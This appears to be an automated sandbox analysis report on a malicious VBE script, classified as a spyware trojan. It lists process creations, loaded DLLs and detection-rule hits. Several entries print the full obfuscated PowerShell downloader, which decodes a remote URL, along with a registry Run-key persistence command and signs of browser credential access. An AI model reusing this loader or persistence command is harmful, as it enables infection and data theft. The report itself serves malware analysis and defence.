              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206951A015_2_206951A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069EAA015_2_2069EAA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069D2B815_2_2069D2B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206932B815_2_206932B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069A7B015_2_2069A7B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069698815_2_20696988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069298815_2_20692988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069BF8815_2_2069BF88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069518F15_2_2069518F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069EA8F15_2_2069EA8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069D78015_2_2069D780
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069948415_2_20699484
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069299815_2_20692998
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069BF9815_2_2069BF98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20697C9815_2_20697C98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069A79F15_2_2069A79F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069949015_2_20699490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069129015_2_20691290
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABC1A215_2_20ABC1A2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABD27815_2_20ABD278
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20AB537015_2_20AB5370
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABC46815_2_20ABC468
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABC73815_2_20ABC738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABE98815_2_20ABE988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABCA0815_2_20ABCA08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABCCD815_2_20ABCCD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABCFA915_2_20ABCFA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABF64015_2_20ABF640
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20AB69B015_2_20AB69B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20AB29E015_2_20AB29E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABE97A15_2_20ABE97A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20ABFA9815_2_20ABFA98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20AB9DE015_2_20AB9DE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20AB3E1815_2_20AB3E18
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5862
              Source: unknownProcess created: Commandline size = 5862
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5862Jump to behavior
              Source: amsi32_2032.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: powershell.exe, 00000003.00000002.1220484407.000002758104C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBPE
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@15/11@4/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Sammenbinder.MoeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1644:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flragmth.tgx.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6564
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2032
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020D3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D61000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D2D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 4500149631.vbeVirustotal: Detection: 29%
              Source: 4500149631.vbeReversingLabs: Detection: 15%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BaiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
